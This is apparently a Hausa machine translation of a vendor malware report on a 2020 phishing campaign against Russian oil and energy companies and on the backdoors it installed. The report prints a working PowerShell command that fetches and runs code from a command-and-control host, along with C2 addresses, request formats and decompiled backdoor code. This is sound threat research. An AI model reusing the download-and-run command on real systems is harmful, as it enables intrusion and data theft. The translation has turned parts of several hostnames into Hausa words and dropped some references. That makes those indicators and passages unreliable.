Kwarewarmu ta binciken abubuwan da suka faru na tsaro na kwamfuta ya nuna cewa imel har yanzu yana ɗaya daga cikin tashoshi na yau da kullun da maharan ke amfani da su don fara shiga abubuwan more rayuwa da aka kai hari. Ɗaya daga cikin rashin kulawa tare da wasiƙar da ake tuhuma (ko ba haka ba) ya zama wurin shiga don ƙarin kamuwa da cuta, wanda shine dalilin da ya sa masu aikata laifukan yanar gizo ke yin amfani da hanyoyin injiniya na zamantakewa, duk da cewa suna da nau'o'in nasara daban-daban.
A cikin wannan sakon muna so muyi magana game da bincikenmu na baya-bayan nan game da yakin neman zabe da ke niyya ga kamfanoni da yawa a cikin hadadden mai da makamashi na Rasha. Dukkan hare-haren sun biyo baya ne ta hanyar amfani da imel na karya, kuma babu wanda ya yi kamar ya yi ƙoƙari sosai a cikin rubutun waɗannan imel.
Sabis na hankali
Hakan ya fara ne a ƙarshen Afrilu 2020, lokacin da masu sharhi kan ƙwayoyin cuta na Doctor Web suka gano wani yaƙin neman zaɓe wanda masu satar bayanai suka aika da sabunta bayanan tarho ga ma'aikatan kamfanoni da yawa a cikin rukunin mai da makamashi na Rasha. Tabbas, wannan ba abu ne mai sauƙi na nuna damuwa ba, tun da directory ɗin ba gaskiya ba ne, kuma takardun .docx sun sauke hotuna biyu daga albarkatun mai nisa.
An zazzage ɗaya daga cikinsu zuwa kwamfutar mai amfani daga labarai[.]zannews[.]com sabar. Abin lura ne cewa sunan yankin yana kama da yankin cibiyar watsa labarai ta yaƙi da cin hanci da rashawa ta Kazakhstan - zannews[.]kz. A gefe guda, yankin da aka yi amfani da shi ya kasance yana tunawa da wani yakin 2015 da aka sani da TOPNEWS, wanda ya yi amfani da ICEFOG baya kuma yana da yankunan sarrafa Trojan tare da "labarai" a cikin sunayensu. Wani fasali mai ban sha'awa shi ne cewa lokacin aika saƙon imel zuwa ga masu karɓa daban-daban, buƙatun don zazzage hoto ana amfani da su ko dai nau'ikan buƙatu daban-daban ko sunayen hoto na musamman.
Mun yi imanin cewa an yi hakan ne don manufar tattara bayanai don gano ma'aikacin "amintaccen", wanda za a ba da tabbacin buɗe wasiƙar a lokacin da ya dace. An yi amfani da ka'idar SMB don zazzage hoton daga uwar garken na biyu, wanda za a iya yi don tattara hashes na NetNTLM daga kwamfutocin ma'aikatan da suka buɗe takardar da aka karɓa.
Ga wasiƙar da kanta tare da kundin adireshin karya:
A watan Yuni na wannan shekara, masu kutse sun fara amfani da sabon sunan yanki, wasanni[.]manhajnews[.]com, don loda hotuna. Binciken ya nuna cewa an yi amfani da subdomains na manhajojin manhajoji a cikin aika wasikun banza tun aƙalla Satumba 2019. Daya daga cikin makasudin wannan yakin shine babbar jami'ar Rasha.
Har ila yau, a watan Yuni, masu shirya harin sun fito da sabon rubutu don wasiƙun su: a wannan lokacin takardar ta ƙunshi bayanai game da ci gaban masana'antu. Rubutun wasiƙar ya nuna a fili cewa marubucin ko dai ba ɗan asalin ƙasar Rasha ba ne, ko kuma da gangan ya haifar da irin wannan ra'ayi game da kansa. Abin takaici, ra'ayoyin ci gaban masana'antu, kamar koyaushe, sun zama murfin kawai - takardar ta sake zazzage hotuna biyu, yayin da aka canza uwar garken zuwa zazzagewa[.]inklingpaper[.]com.
Bidi'a ta gaba ta biyo baya a watan Yuli. A yunƙurin ƙetare gano munanan takardu ta shirye-shiryen riga-kafi, maharan sun fara amfani da takaddun Microsoft Word rufaffiyar da kalmar sirri. A lokaci guda, maharan sun yanke shawarar yin amfani da fasahar injiniyan zamantakewa ta al'ada - sanarwar lada.
An sake rubuta rubutun roko a cikin salo iri ɗaya, wanda ya haifar da ƙarin tuhuma a tsakanin mai magana. Sabar don zazzage hoton kuma bai canza ba.
Lura cewa a duk lokuta, akwatunan wasiku na lantarki da aka yi rajista akan wasiku[.]ru da yandex[.] ru da aka yi amfani da su don aika haruffa.
Kai hari
Zuwa farkon Satumba 2020, lokacin aiki ya yi. Manazarta kwayoyin cutar mu sun yi wani sabon salon hare-hare, inda maharan suka sake aike da wasiku a karkashin sunan sabunta kundin adireshin waya. Koyaya, wannan lokacin abin da aka makala yana ƙunshe da macro.
Lokacin buɗe daftarin aiki, macro ya ƙirƙiri fayiloli guda biyu:
- Rubutun VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, wanda aka yi niyya don ƙaddamar da fayil ɗin tsari;
- Fayil ɗin batch kanta %APPDATA%configstest.bat, wanda aka rufe.
Asalin aikin sa ya zo ne don ƙaddamar da harsashi na Powershell tare da wasu sigogi. An tsara sigogin da aka wuce zuwa harsashi zuwa umarni:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Kamar yadda daga cikin umarnin da aka gabatar, yankin da aka sauke nauyin kaya daga gare shi yana sake canza kama da gidan labarai. Mai sauƙi , wanda kawai aikinsa shine karɓar shellcode daga umarni da uwar garken sarrafawa da aiwatar da shi. Mun sami damar gano nau'ikan ƙofofin baya guda biyu waɗanda za'a iya shigar dasu akan PC ɗin wanda aka azabtar.
Kofar Baya.Siggen2.3238
Na farko shine Kofar Baya.Siggen2.3238 - ƙwararrun mu ba su taɓa saduwa da su a baya ba, kuma babu sauran ambaton wannan shirin ta wasu dillalai na riga-kafi.
Wannan shirin kofa ce da aka rubuta a cikin C++ kuma tana aiki akan tsarin aiki na Windows 32-bit.
Kofar Baya.Siggen2.3238 yana iya sadarwa tare da uwar garken gudanarwa ta amfani da ladabi guda biyu: HTTP da HTTPS. Samfurin da aka gwada yana amfani da ka'idar HTTPS. Ana amfani da Wakilin mai amfani mai zuwa a buƙatun sabar:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
A wannan yanayin, ana ba da duk buƙatun tare da saitin sigogi masu zuwa:
%s;type=%s;length=%s;realdata=%send
inda kowane layi %s aka maye gurbinsu daidai da:
- ID na kwamfutar da ya kamu da cutar,
- nau'in buƙatar da ake aikawa,
- Tsawon bayanai a cikin filin realdata,
- bayanai.
A mataki na tattara bayanai game da kamuwa da cuta, bayan gida yana samar da layi kamar:
lan=%s;cmpname=%s;username=%s;version=%s;
inda lan shine adireshin IP na kwamfutar da ta kamu da cutar, cmpname shine sunan kwamfuta, sunan mai amfani shine sunan mai amfani, sigar ita ce layin 0.0.4.03.
Ana aika wannan bayanin tare da mai gano sisinfo ta hanyar buƙatun POST zuwa uwar garken sarrafawa da ke https[:]//31.214[.]157.14/log.txt. Idan a mayar da martani Kofar Baya.Siggen2.3238 yana karɓar siginar ZUCIYA, haɗin yana ɗaukar nasara, kuma bayan gida yana fara babban yanayin sadarwa tare da uwar garke.
Cikakken cikakken bayanin ƙa'idodin aiki Kofar Baya.Siggen2.3238 yana cikin mu .
Kofar Baya.Whitebird.23
Shirin na biyu shine gyara na BackDoor.Whitebird backdoor, wanda muka riga muka sani daga lamarin da wata hukumar gwamnati a Kazakhstan. An rubuta wannan sigar a cikin C++ kuma an tsara shi don aiki akan tsarin aiki na Windows 32-bit da 64-bit.
Kamar yawancin shirye-shiryen irin wannan, Kofar Baya.Whitebird.23 an ƙera shi don kafa haɗin ɓoye tare da uwar garken sarrafawa da sarrafa kwamfuta mara izini. An shigar da shi cikin tsarin da ba a daidaita ba ta amfani da digo .
Samfurin da muka bincika shine ɗakin karatu na mugunta tare da fitarwa guda biyu:
- Google Play
- Gwaji.
A farkon aikinsa, yana lalata tsarin da aka haɗa cikin jikin bayan gida ta amfani da algorithm dangane da aikin XOR tare da byte 0x99. Tsarin tsari yayi kama da:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Don tabbatar da aikin sa akai-akai, bayan gida yana canza ƙimar da aka ƙayyade a cikin filin lokutan aiki daidaitawa. Filin ya ƙunshi 1440 bytes, waɗanda ke ɗaukar ƙimar 0 ko 1 kuma suna wakiltar kowane minti na kowane sa'a a cikin rana. Yana ƙirƙira keɓantaccen zaren don kowane cibiyar sadarwa ta hanyar sadarwa wanda ke sauraren mahaɗin kuma yana neman fakitin izini akan sabar wakili daga kwamfutar da ta kamu da cutar. Lokacin da aka gano irin wannan fakiti, ƙofar baya tana ƙara bayani game da uwar garken wakili zuwa jerin sa. Bugu da ƙari, bincika kasancewar wakili ta hanyar WinAPI InternetQueryOptionW.
Shirin yana duba minti da sa'a na yanzu kuma yana kwatanta shi da bayanan da ke cikin filin lokutan aiki daidaitawa. Idan ƙimar daidaitaccen minti na rana ba sifili ba ne, to an kafa haɗi tare da uwar garken sarrafawa.
Ƙirƙirar haɗi zuwa uwar garken yana kwatanta ƙirƙirar haɗin kai ta amfani da ka'idar TLS 1.0 tsakanin abokin ciniki da uwar garken. Jikin bayan gida ya ƙunshi buffer biyu.
Buffer na farko ya ƙunshi fakitin Sannu Client TLS 1.0.
Buffer na biyu ya ƙunshi fakitin Musanya Maɓalli na TLS 1.0 tare da maɓalli na tsawon 0x100 bytes, Canja Siffar Siffar, Saƙon Hannu da Rufaffen.
Lokacin aika fakitin Sannu abokin ciniki, ƙofar baya tana rubuta bytes 4 na lokacin yanzu da 28 bytes na bayanan bazuwar a cikin filin Random na Abokin ciniki, ƙididdiga kamar haka:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Ana aika fakitin da aka karɓa zuwa uwar garken sarrafawa. Amsa (Packet Hello Server) yana duba:
- yarda da sigar yarjejeniya ta TLS 1.0;
- wasiƙun tambarin lokaci (bytes 4 na farko na filin fakitin Random Data) wanda abokin ciniki ya kayyade zuwa tambarin lokutan da uwar garken ya kayyade;
- wasa na farko 4 bytes bayan tambarin lokaci a cikin Random Data filin na abokin ciniki da uwar garken.
Idan akwai ƙayyadaddun matches, ƙofar baya tana shirya fakitin Musayar Maɓalli na Abokin ciniki. Don yin wannan, yana canza Maɓallin Jama'a a cikin fakitin Musayar Maɓalli na Abokin ciniki, da kuma Rufewa IV da Bayanan ɓoyewa a cikin fakitin Saƙon Hannu da Rufaffe.
Ƙofar baya tana karɓar fakitin daga umarni da uwar garken sarrafawa, bincika cewa sigar ka'idar TLS 1.0 ce, sannan ta karɓi wani 54 bytes (jikin fakitin). Wannan yana kammala saitin haɗin.
Cikakken cikakken bayanin ƙa'idodin aiki Kofar Baya.Whitebird.23 yana cikin mu .
Ƙarshe da Ƙarshe
Binciken takardu, malware, da kayan aikin da aka yi amfani da su ya ba mu damar faɗi da gaba gaɗi cewa ɗayan ƙungiyoyin APT na China ne suka shirya harin. Idan aka yi la’akari da ayyukan ƙofofin baya waɗanda aka shigar a kan kwamfutocin waɗanda abin ya shafa a yayin da aka samu nasarar kai hari, kamuwa da cuta yana haifar da, aƙalla, zuwa satar bayanan sirri daga kwamfutocin ƙungiyoyin da aka kai hari.
Bugu da kari, mai yuwuwar yanayin shine shigar da Trojans na musamman akan sabar gida tare da aiki na musamman. Waɗannan na iya zama masu sarrafa yanki, sabar saƙo, ƙofofin Intanet, da sauransu. Kamar yadda muke iya gani a misali , irin waɗannan sabar suna da sha'awa ta musamman ga maharan saboda dalilai daban-daban.
source: www.habr.com